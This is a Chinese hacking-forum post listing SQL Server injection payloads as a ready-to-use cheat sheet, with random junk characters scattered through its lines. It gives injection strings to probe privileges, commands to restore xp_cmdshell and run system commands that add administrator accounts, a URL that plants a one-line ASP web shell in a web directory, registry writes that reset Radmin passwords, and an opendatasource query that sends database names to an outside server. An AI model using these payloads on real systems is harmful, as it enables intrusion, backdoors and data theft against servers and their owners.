找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2005|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
2 @/ b! b/ e$ Z5 ~and 1=(Select IS_MEMBER('db_owner'))7 r) ^( z; I+ h" e4 ~4 [
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--) P. O8 s& f. o; ^

3 R& h& A2 e1 X/ a- J$ a2 e1 G9 J/ [//检测是否有读取某数据库的权限
) u- T$ V; H/ V4 iand 1= (Select HAS_DBACCESS('master')): r6 ~! \5 v% T5 O1 N
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
/ u, V( x% K* j) a$ ?) K" X, N
. g8 f+ d! C# P) {) K) T
" k' z3 s2 F; _8 X7 x. j/ s$ O数字类型
- h: g9 J4 Y: v% A$ j. Y3 Mand char(124)%2Buser%2Bchar(124)=0
6 t+ U  B, f( T3 `$ J) w* j& d# r# ]2 v. o
+ d8 O! J( `( O6 y# ?5 B字符类型. Z0 g; E( o. j4 A, R) m
' and char(124)%2Buser%2Bchar(124)=0 and ''='
; P/ n( ?  H) l/ _" H) P, ]
, B) @- Y8 `9 [" B. k8 N搜索类型
8 c$ f: n5 k) K) L' and char(124)%2Buser%2Bchar(124)=0 and '%'='! Y. {; S7 a# p( o
3 C( I, M/ f: B) R  c
爆用户名/ }3 p& O* H# {6 s7 r7 n( a
and user>0
9 M6 g/ t2 |9 c+ }* N5 J+ \8 |' and user>0 and ''='
7 e+ v1 x, l; l1 }' K6 N+ |0 r
检测是否为SA权限
6 V7 L& a% b5 z+ xand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
; a8 d0 C1 d# V1 x: k+ [$ H5 cAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
0 K+ A9 e9 a( U
) ^$ v/ A1 J9 D/ [+ X5 e检测是不是MSSQL数据库) ]! T1 r% v$ Q8 _
and exists (select * from sysobjects);--5 y2 i7 t1 i4 I: a; v5 {; ^" K
( W% [: O9 i4 p; P9 i
检测是否支持多行
3 D+ `# U4 h% X;declare @d int;--
' N' a% _. d8 I, F- Z; h; d4 B! m7 ~" v* u
恢复 xp_cmdshell7 o/ c( A" B' X( U6 s; E. `
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--; W+ Y5 w7 x8 y2 W& d

; B6 L# z1 B3 w6 P) I; s& M, E* l: @0 Z4 r
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
- ?& k7 X) C9 ^& ^7 Y/ L
, N+ Z- Z5 ~! y% Z) s* {! R$ b4 V//-----------------------
2 h) o  d. K% K  V/ ^9 I//       执行命令
% {' J! D" s) A& i//-----------------------/ X4 i/ c( z( i7 K" A) a2 s" B
首先开启沙盘模式:
" |) a" ]6 N) j9 qexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1" D4 O3 Z+ [: C% r. ]! q: V( o

" j; O' |6 h2 E" W# k! S. K然后利用jet.oledb执行系统命令6 n  t! M% K8 c3 P5 M  s# t
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
& `- w7 l6 P3 i2 m; k& \. j
. B& r$ Q4 ?  E2 T8 P- ~: c) r执行命令/ A$ U. O: Y' H- \7 N( q
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
& {  a9 Y1 C  J- H
3 B0 L/ \: f. h7 jEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'" P* E" e- [6 |2 ?4 M" J( y: y" ^  f

7 |$ }4 B  H) \) {# k判断xp_cmdshell扩展存储过程是否存在:0 B. I$ ]# _' }. _- l3 }# i
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')8 H3 f" \! ^9 P
9 x$ D6 k  Q: ~4 O  G
写注册表
7 H/ d: k; F* N$ [exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# ^4 }& s, ]' \) C! l
: a3 d$ l$ |2 p% H8 W% N8 {REG_SZ6 E% S, ?: c* G; r
- e2 i% ^$ Y( d0 v/ {! Z, Y
读注册表4 J+ r$ v+ L4 n* I; r
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
( r; [7 A( `1 u/ `* s! b
5 c" O& U9 a, m, h3 s8 o) l读取目录内容
% s$ X' R9 a6 s* N9 K. Pexec master..xp_dirtree 'c:\winnt\system32\',1,1
7 R. ]' i! y0 Q+ x3 @6 O+ x8 d+ q
0 [& O! h- U9 O( M1 R$ ~+ S" z& s3 y! K4 l4 b
数据库备份# e; r+ m/ Q' Y2 c
backup database pubs to disk = 'c:\123.bak'
( x* r- ]9 P' B# t" Y! o) P# W  [
//爆出长度
" j2 Y0 M# v2 t4 f, I; KAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--& b9 M5 I4 T2 b. y% Q% L0 R
/ V3 [" z8 f& B1 _/ v

( D5 |9 V: M. O! b2 t
( X& x' a3 N6 p* d( c更改sa口令方法:用sql综合利用工具连接后,执行命令:. M! F; O7 m) w% ~1 z5 ~/ u
exec sp_password NULL,'新密码','sa'
0 }3 P# J. R" b  W# L$ f: p; Q$ w0 J
添加和删除一个SA权限的用户test:: w, ?3 N; {  Y9 S4 \
exec master.dbo.sp_addlogin test,95307725 g( ]  X- {. t, I# s. @
exec master.dbo.sp_addsrvrolemember test,sysadmin
# N0 \% V: S+ O2 s! r1 r* h& ^2 ~8 k3 W# k* L+ w/ [& ]7 O4 w( y
删除扩展存储过过程xp_cmdshell的语句:
6 [3 z0 K9 r+ U/ Bexec sp_dropextendedproc 'xp_cmdshell'2 v0 f4 S+ e; w& ~* T! {

. y' \9 k; x- B9 M添加扩展存储过过程" ^. j- K$ V* A% w/ k
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'/ b. E0 s/ f3 T/ C# u; Q. Q5 S0 z
GRANT exec On xp_proxiedadata TO public
2 y3 Q: F" O/ a9 ]- u. c$ P$ j. A, i( g" K" Y2 R# B5 R. X

: g! d8 @: h1 Q% ~: y停掉或激活某个服务。
, z" f1 l6 a5 H6 c2 X) W8 z9 r3 H& _! B' ?% o! V, W- b- }  c
exec master..xp_servicecontrol 'stop','schedule'
/ `4 h5 f9 J0 Q( bexec master..xp_servicecontrol 'start','schedule'4 C- d& G: L6 [6 H4 U2 ^6 k+ e
5 ~2 [, `6 X& S* b: {
dbo.xp_subdirs
" ]% M% m- ~  T! D% O# P) Z2 J
8 m* |5 H1 f* z只列某个目录下的子目录。( \8 ?) g3 G6 v4 w/ @
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
7 K* W. G! K$ n! e0 Q, C5 f' |( u- o0 \/ ^- F8 Q# W. S! @
dbo.xp_makecab7 H& z5 ^' Z% [
. l: P4 ?) a+ r. o, t
将目标多个档案压缩到某个目标档案之内。; W! o% U' k" M+ V0 D
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
$ D# @! r8 X- t5 m- `8 P4 [( R3 F+ w1 f, O- M& a
dbo.xp_makecab
" x+ J0 B% g* f2 S/ [, |. b'c:\test.cab','mszip',1,
" ~3 ]( Q. T' p  C, S'C:\Inetpub\wwwroot\SQLInject\login.asp',
6 t/ r- }8 t: v; N7 k'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'5 l* c8 _$ g  ^) y. v2 R( }5 h

; A' W3 {& M* J- C6 ?, r% [* kxp_terminate_process8 ~0 P( Z5 o' N# k$ x9 b' h& a

/ y8 E0 G* h  V" B- Q/ n3 K3 X. {停掉某个执行中的程序,但赋予的参数是 Process ID。5 k* n9 X/ a/ f4 s2 f$ Q
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID9 S3 U8 |6 I" y4 M' j

4 V5 A1 g! B0 y" F  T' nxp_terminate_process 2484
! e$ o# r4 o2 y4 R, p, z& d- O& s0 b+ [0 S8 E: B
xp_unpackcab
% `7 Q% c. w. n1 \( b
7 Z! B8 m- ^$ T, V) Q1 V" A解开压缩档。
& _& X- P$ L6 t5 D' I$ t% B) c! X. C* r' c
xp_unpackcab 'c:\test.cab','c:\temp',1
) `4 b/ Z* o; A+ P5 @4 m5 r2 ^
6 e2 Q) M0 v1 k( s7 p& I& |) f1 u+ Y) w+ v
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
0 p$ j' U7 h2 G7 b
5 v) O# g/ X" ]create database lcx;' I; J' v2 j: B- W* O
Create TABLE ku(name nvarchar(256) null);
! W6 D3 f7 T/ D6 f; ACreate TABLE biao(id int NULL,name nvarchar(256) null);
7 Y  ~3 d' x7 c1 ?3 c/ R7 Y
2 O: Q: x) O5 p8 m//得到数据库名
: b; y1 ^# i8 M6 }insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases' v+ A! |- Q: d" H
6 ^+ p) d. z2 P1 d
; F! @' j+ L1 l' N; s$ c% n; d  I, Y$ `
//在Master中创建表,看看权限怎样. E! W2 Y6 B' `! {
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
3 j$ h: w* Y! ?# J7 G
9 @/ H; j* {- F7 U: S用 sp_makewebtask直接在web目录里写入一句话马:
/ p" @% l8 A( v4 C' mhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--1 _( e9 j% q( ^( y
. W, V0 C: i. t4 d/ u' J, i7 A
//更新表内容
; w0 s6 i1 H- i( fUpdate films SET kind = 'Dramatic' Where id = 1234 s/ E8 S- a# Y5 A
! `; t: I6 m; W
//删除内容" ]. F/ U( n6 r; y6 W  R1 n
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表